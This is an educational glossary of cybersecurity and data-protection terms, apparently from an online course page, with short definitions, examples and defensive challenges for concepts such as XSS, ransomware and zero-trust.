Cybersecurity and Data Protection
Expert-defined terms from the Postgraduate Certificate in Cyberpsychology course at LearnUNI. Free to read, free to share, paired with a professional course.
Attack Vector #
Attack Vector
An attack vector is the path or method used by a threat actor to gain unauthoriz… #
Common vectors include phishing emails, compromised web applications, and vulnerable IoT devices. In practice, security teams map attack vectors during risk assessments to prioritize remediation. For example, a ransomware campaign may exploit an unpatched Windows SMB service as its vector. Challenges arise when new vectors appear faster than patch cycles, requiring continuous monitoring and adaptive defenses.
Authentication #
Authentication
Authentication verifies that a user or device is who it claims to be, typically… #
Strong authentication reduces the likelihood of unauthorized access. A practical application is the use of MFA for remote employee logins to corporate VPNs. However, usability concerns, such as token loss or biometric error rates, can hinder adoption, and attackers may still employ credential‑stuffing attacks against weak passwords.
Authorization #
Authorization
Authorization determines what authenticated entities are allowed to do within a… #
It enforces policies that restrict actions based on roles, groups, or attributes. For instance, an HR employee may have read‑only access to employee records, while a manager has edit rights. The main challenge is maintaining least‑privilege over time as users change roles, which often leads to permission creep if not regularly reviewed.
Advanced Persistent Threat (APT) #
Advanced Persistent Threat (APT)
An APT is a sophisticated, long‑term intrusion typically sponsored by a nation‑s… #
Attackers aim to remain undetected while exfiltrating valuable data. An example is the “Stuxnet” worm that targeted industrial control systems. Mitigating APTs requires layered defenses, continuous threat hunting, and rapid incident response, yet the covert nature of these campaigns makes detection extremely difficult.
Botnet #
Botnet
A botnet is a network of compromised devices controlled remotely to perform coor… #
Botnets often exploit IoT devices with default credentials. A real‑world case is the Mirai botnet that generated massive DDoS traffic in 2016. Challenges include the sheer scale of infected endpoints and the need for coordinated takedown efforts across jurisdictions.
Brute‑Force Attack #
Brute‑Force Attack
In a brute‑force attack, an attacker systematically tries many possible password… #
Simple dictionary attacks on weak passwords are common. Organizations mitigate this risk using account lockout policies and MFA. However, attackers can bypass lockout mechanisms with distributed botnets, making rate‑limiting and anomaly detection essential but sometimes resource‑intensive.
Breach Notification #
Breach Notification
Breach notification is the legal requirement to inform affected individuals and… #
Regulations such as GDPR and HIPAA specify timelines (e.G., 72 Hours for GDPR). A practical scenario involves a retailer notifying customers after a point‑of‑sale breach. Challenges include determining the scope of the breach, coordinating with legal teams, and managing reputational damage.
Cipher #
Cipher
A cipher is a mathematical algorithm that transforms plaintext into ciphertext u… #
Modern ciphers like AES (Advanced Encryption Standard) provide strong confidentiality. For example, an organization encrypts backup files with AES‑256 before storing them in the cloud. The main challenges are key management, ensuring proper implementation, and guarding against side‑channel attacks that may leak information despite strong ciphers.
Confidentiality #
Confidentiality
Confidentiality ensures that sensitive information is accessible only to authori… #
Encryption, access controls, and data masking are typical controls. A practical application is encrypting patient health records in electronic health systems. The difficulty lies in balancing confidentiality with usability; overly restrictive controls can impede legitimate workflows, leading users to seek insecure workarounds.
Cookie #
Cookie
A cookie is a small data file stored on a user’s browser to maintain state, such… #
Secure cookies (with the Secure and HttpOnly flags) protect against eavesdropping and XSS. In practice, web developers use cookies to remember user preferences. Challenges include preventing cross‑site request forgery (CSRF) and ensuring compliance with privacy regulations that require user consent for tracking cookies.
Cross‑Site Scripting (XSS) #
Cross‑Site Scripting (XSS)
XSS is a client‑side code injection attack where malicious scripts are injected… #
An attacker may embed JavaScript in a comment field, causing the script to execute in the browsers of other users. Defenses include proper input sanitization and CSP headers. The challenge is that many legacy applications lack proper encoding, making them vulnerable even after patches.
Data Encryption #
Data Encryption
Data encryption transforms readable data into ciphertext to protect it from unau… #
Encryption can be applied to data at rest (e.G., Encrypted databases) and in transit (e.G., TLS for web traffic). A practical use case is encrypting mobile device storage to prevent data exposure if the device is lost. Challenges revolve around secure key storage, performance overhead, and ensuring that encryption does not impede legitimate analytics.
Digital Forensics #
Digital Forensics
Digital forensics involves collecting, preserving, and analyzing electronic evid… #
Techniques include memory imaging, log analysis, and file system reconstruction. For example, after a ransomware incident, forensic investigators may recover encryption keys from memory dumps. The main challenges are maintaining evidence integrity, dealing with encrypted data, and staying current with rapidly evolving malware techniques.
DNS Spoofing #
DNS Spoofing
DNS spoofing manipulates DNS responses to redirect users to malicious sites #
An attacker may poison a resolver’s cache, causing victims to connect to a fake login page. Countermeasures include DNSSEC signing and using encrypted DNS (DoH). However, not all resolvers support DNSSEC, and encrypted DNS can introduce latency, making deployment a trade‑off.
Endpoint Security #
Endpoint Security
Endpoint security protects devices such as laptops, smartphones, and servers fro… #
Solutions often combine antivirus, application control, and device encryption. A typical scenario is deploying an endpoint detection and response (EDR) platform across a corporate fleet to detect abnormal processes. Challenges include managing diverse operating systems, preventing false positives, and ensuring that security agents do not degrade device performance.
Encryption Key #
Encryption Key
An encryption key is a secret value used by a cipher to encrypt or decrypt data #
Proper key lifecycle management (generation, distribution, rotation, revocation) is critical. For instance, cloud providers offer KMS to automatically rotate keys for encrypted storage buckets. The difficulty lies in protecting keys from insider threats and preventing loss, which would render encrypted data unrecoverable.
Ethical Hacking #
Ethical Hacking
Ethical hacking involves authorized attempts to discover security weaknesses, he… #
Certified professionals (e.G., CEH, OSCP) perform controlled attacks to simulate real‑world threats. A practical application is a quarterly penetration test of a web application. Challenges include scope creep, ensuring that testing does not disrupt production services, and translating findings into actionable remediation.
Firewall #
Firewall
A firewall controls inbound and outbound network traffic based on predefined sec… #
Traditional firewalls filter packets by IP and port, while NGFWs add application awareness and intrusion prevention. For example, an enterprise may block all inbound traffic except HTTPS to public servers. Limitations arise when encrypted traffic bypasses inspection, requiring decryption capabilities that can raise privacy concerns.
Phishing #
Phishing
Phishing is a deceptive technique where attackers impersonate trusted entities t… #
Spear‑phishing targets specific individuals with tailored content. Organizations deploy email filters and user training to mitigate risk. Nevertheless, attackers continuously refine tactics, making it hard to achieve zero‑click protection.
Public Key Infrastructure (PKI) #
Public Key Infrastructure (PKI)
PKI is a framework for creating, managing, and revoking digital certificates tha… #
It enables secure communications, code signing, and device authentication. A common use is TLS certificates for web servers. Challenges include protecting private keys, handling certificate expiration, and managing trust across multiple CAs in large federated environments.
Ransomware #
Ransomware
Ransomware encrypts victim data and demands payment for the decryption key #
Variants like “WannaCry” exploit unpatched SMB vulnerabilities. Effective mitigation includes regular backups, network segmentation, and patch management. The difficulty lies in the rapid evolution of ransomware payloads and the temptation for victims to pay, which can encourage further attacks.
Risk Assessment #
Risk Assessment
Risk assessment evaluates the likelihood and impact of potential security events… #
Methods include qualitative scoring and quantitative calculations (e.G., Annualized Loss Expectancy). A practical example is assessing the risk of a data breach in a SaaS product. Challenges include obtaining accurate asset inventories, quantifying intangible impacts, and keeping assessments current as the threat landscape evolves.
Secure Socket Layer / Transport Layer Security (SSL/TLS) #
Secure Socket Layer / Transport Layer Security (SSL/TLS)
SSL/TLS provides encrypted communication between clients and servers, protecting… #
During the handshake, the server presents a certificate, and both parties negotiate a cipher suite. For instance, browsers use TLS 1.3 To secure e‑commerce transactions. Implementation pitfalls such as outdated protocol versions or weak ciphers can expose traffic to downgrade attacks, requiring diligent configuration management.
Social Engineering #
Social Engineering
Social engineering exploits human psychology to gain unauthorized access, often… #
An attacker may call a help‑desk employee, posing as a senior manager to reset a password. Training programs that simulate phishing attacks help raise awareness. However, cultural factors and fatigue can reduce effectiveness, making continuous reinforcement essential.
Supply Chain Attack #
Supply Chain Attack
A supply chain attack compromises a trusted vendor to infiltrate downstream cust… #
The SolarWinds incident is a notable example where malicious code was inserted into an update package. Mitigation strategies include code signing, SBOM verification, and strict vendor vetting. The challenge is that many organizations lack visibility into the security posture of their numerous suppliers.
Threat Modeling #
Threat Modeling
Threat modeling systematically identifies potential threats, attacks, and mitiga… #
Frameworks such as STRIDE (Spoofing, Tampering, Repudiation, Information Disclosure, Denial‑of‑Service, Elevation of Privilege) guide analysts. In practice, developers may create data flow diagrams to pinpoint insecure interfaces. The difficulty is allocating sufficient time during agile development cycles and ensuring that the model stays aligned with evolving architecture.
Two‑Factor Authentication (2FA) #
Two‑Factor Authentication (2FA)
2FA adds a second verification step #
typically something the user has (a token or mobile app) in addition to something they know (a password). An example is a corporate VPN that requires a password plus a time‑based OTP generated by an authenticator app. While 2FA significantly reduces credential‑stuffing success, it can be vulnerable to phishing‑in‑the‑middle attacks if the second factor is not cryptographically bound to the originating site.
Zero‑Day Exploit #
Zero‑Day Exploit
A zero‑day exploit leverages a previously unknown vulnerability for which no pat… #
Attackers sell such exploits on underground markets, and defenders must rely on behavioral detection. The “EternalBlue” exploit, later used by WannaCry, illustrates the impact of a zero‑day in widely deployed software. Mitigation focuses on network segmentation, intrusion detection, and rapid patch deployment once the vulnerability becomes known, but the initial window of exposure remains a critical risk.
Zero‑Trust Architecture #
Zero‑Trust Architecture
Zero‑trust assumes no implicit trust for any user or device, regardless of locat… #
Access is granted based on contextual policies, and every request is verified. A common implementation is a software‑defined perimeter that authenticates users before allowing access to internal applications. Challenges include the complexity of policy definition, integration with legacy systems, and potential performance impacts due to continuous verification.
Access Control List (ACL) #
Access Control List (ACL)
An ACL is a set of rules that define which users or system processes are granted… #
For instance, a router ACL may block traffic from known malicious IP ranges. Managing ACLs at scale can become error‑prone, leading to overly permissive rules that increase attack surface.
Biometric Authentication #
Biometric Authentication
Biometric authentication uses unique physiological traits to verify identity #
Modern smartphones employ fingerprint or facial scanners for unlocking devices and authorizing payments. While convenient, biometric data is immutable—if compromised it cannot be changed like a password. Implementations must incorporate liveness detection to thwart spoofing attacks, and privacy regulations require explicit user consent for storage of biometric templates.
Certificate Pinning #
Certificate Pinning
Certificate pinning hard‑codes the expected server certificate or public key in… #
Mobile apps often pin the API server’s certificate to mitigate MitM attacks on public Wi‑Fi. However, pinning can cause service disruption if the certificate is legitimately rotated, demanding robust update mechanisms.
Data Loss Prevention (DLP) #
Data Loss Prevention (DLP)
DLP solutions monitor and protect data at rest, in motion, and in use, preventin… #
Policies may block copying of credit‑card numbers to external USB drives. In practice, organizations deploy DLP gateways on email and web traffic. The main challenge is balancing security with user productivity, as overly restrictive policies can lead to “shadow IT” where users bypass controls.
Encryption at Rest #
Encryption at Rest
Encryption at rest protects stored data from unauthorized access, especially if… #
Full‑disk encryption (e.G., BitLocker) encrypts the entire drive, while TDE encrypts database files. A practical scenario is encrypting backup tapes before off‑site storage. Difficulties include ensuring that encryption keys are not stored on the same device and managing performance overhead for high‑throughput workloads.
Exploit Kit #
Exploit Kit
An exploit kit is a collection of pre‑written exploits targeting known software… #
The “Angler” exploit kit chained multiple vulnerabilities to deliver ransomware payloads. Defenses involve keeping software patched, employing web‑gateway filtering, and disabling unnecessary browser plugins. Attackers constantly update kits, making signature‑based detection less effective.
Incident Response (IR) #
Incident Response (IR)
IR is a structured approach to handling security incidents, from detection throu… #
A typical IR plan includes phases: Preparation, identification, containment, eradication, recovery, and lessons learned. For example, after a phishing breach, an organization may isolate affected endpoints, reset credentials, and conduct forensic analysis. The biggest hurdles are ensuring cross‑team coordination and maintaining up‑to‑date playbooks that reflect emerging threats.
Intrusion Detection System (IDS) #
Intrusion Detection System (IDS)
An IDS monitors network or host activity for suspicious patterns and alerts secu… #
Signature‑based IDS relies on known attack signatures, while anomaly‑based IDS uses statistical models to detect deviations. Deploying a network IDS can reveal port scans or lateral movement attempts. However, high false‑positive rates can overwhelm analysts, and encrypted traffic reduces visibility unless decryption is performed.
Key Escrow #
Key Escrow
Key escrow involves storing encryption keys with a trusted third party so that a… #
Some governments mandate escrow for communications providers. While escrow can aid lawful access, it introduces a single point of failure; if the escrow repository is compromised, all encrypted data becomes vulnerable.
Least Privilege #
Least Privilege
Least privilege is the principle that users and processes should receive only th… #
Applying this reduces the impact of compromised accounts. For instance, a database service account should not have admin rights on the host OS. Implementing least privilege can be complex in large environments where many inter‑dependent services require fine‑grained permissions, leading to “permission creep” if not regularly audited.
Man‑in‑the‑Middle (MitM) #
Man‑in‑the‑Middle (MitM)
A MitM attack intercepts communication between two parties, allowing the attacke… #
An example is an attacker inserting a rogue Wi‑Fi access point and capturing unencrypted HTTP traffic. Countermeasures include TLS with certificate validation, HSTS, and VPNs. The challenge is that many users still access services over insecure protocols, providing ample opportunity for MitM exploitation.
Network Segmentation #
Network Segmentation
Network segmentation divides a larger network into smaller, isolated zones to li… #
A common practice is separating finance, HR, and guest networks using VLANs. In a breach, segmentation can contain the attacker to a single zone. However, misconfigured segmentation can create blind spots, and overly rigid boundaries may hinder legitimate inter‑departmental workflows.
Patch Management #
Patch Management
Patch management is the process of acquiring, testing, and deploying software up… #
Automated tools can schedule patch rollouts across thousands of endpoints. A real‑world scenario is applying the “PrintNightmare” patches to Windows print services. Challenges include balancing the urgency of critical patches against the risk of breaking production systems, and handling legacy devices that cannot be patched.
Pharming #
Pharming
Pharming redirects users from legitimate websites to fraudulent ones by compromi… #
Victims may unknowingly submit credentials to a fake banking site. Defenses include DNSSEC, regular host file integrity checks, and user education. The difficulty lies in detecting subtle DNS anomalies, especially when attackers use fast‑flux networks to rotate malicious IPs.
Public Wi‑Fi Security #
Public Wi‑Fi Security
Public Wi‑Fi networks are often unsecured, exposing users to eavesdropping and M… #
Best practice recommends using a VPN to encrypt traffic and avoiding sensitive transactions on open networks. An example is a traveler connecting to a coffee shop’s Wi‑Fi and using a corporate VPN for email access. Limitations include VPN performance degradation and user reluctance to install additional software.
Ransomware Negotiation #
Ransomware Negotiation
Negotiation involves communicating with ransomware operators to obtain decryptio… #
Some organizations employ third‑party negotiators specialized in cyber extortion. While negotiation can lead to data recovery without paying the full amount, it may also encourage further attacks and poses legal risks if payments violate sanctions. The ethical dilemma of paying versus maintaining data integrity remains a contentious issue.
Security Information and Event Management (SIEM) #
Security Information and Event Management (SIEM)
A SIEM collects and analyzes logs from diverse sources, providing real‑time aler… #
For example, a SIEM can correlate failed login attempts with a known malicious IP to trigger an incident response. Scalability and tuning are major challenges; excessive data can cause alert fatigue, while insufficient coverage may miss subtle attacks.
Supply Chain Risk Management (SCRM) #
Supply Chain Risk Management (SCRM)
SCRM identifies and mitigates risks associated with external suppliers and servi… #
Practices include conducting security questionnaires, requiring contractual security clauses, and reviewing software component provenance via SBOMs. A notable case is the SolarWinds supply chain breach. The difficulty lies in achieving visibility across a sprawling ecosystem of subcontractors and ensuring consistent security standards.
Threat Intelligence #
Threat Intelligence
Threat intelligence provides contextual information about adversaries, their mot… #
It can be strategic (geopolitical trends), tactical (IoCs), or operational (specific attack plans). Organizations ingest feeds to enrich SIEM alerts and prioritize patches. However, the sheer volume of data can overwhelm analysts, and inaccurate intelligence may lead to misdirected defenses.
Zero‑Day Patch #
Zero‑Day Patch
A zero‑day patch is an emergency software update released to fix a critical vuln… #
Vendors may issue a zero‑day patch outside normal release cycles, as seen with the “Log4Shell” vulnerability. Rapid deployment is essential, yet many organizations lack automated patching pipelines, leading to delayed remediation and extended exposure.
Zero‑Trust Network Access (ZTNA) #
Zero‑Trust Network Access (ZTNA)
ZTNA replaces traditional VPNs by granting access to applications based on verif… #
Users only see the resources they are authorized for, reducing attack surface. A practical deployment uses a cloud‑based ZTNA broker that authenticates users before connecting them to internal services. Integration with legacy applications can be complex, and performance latency may arise due to additional authentication hops.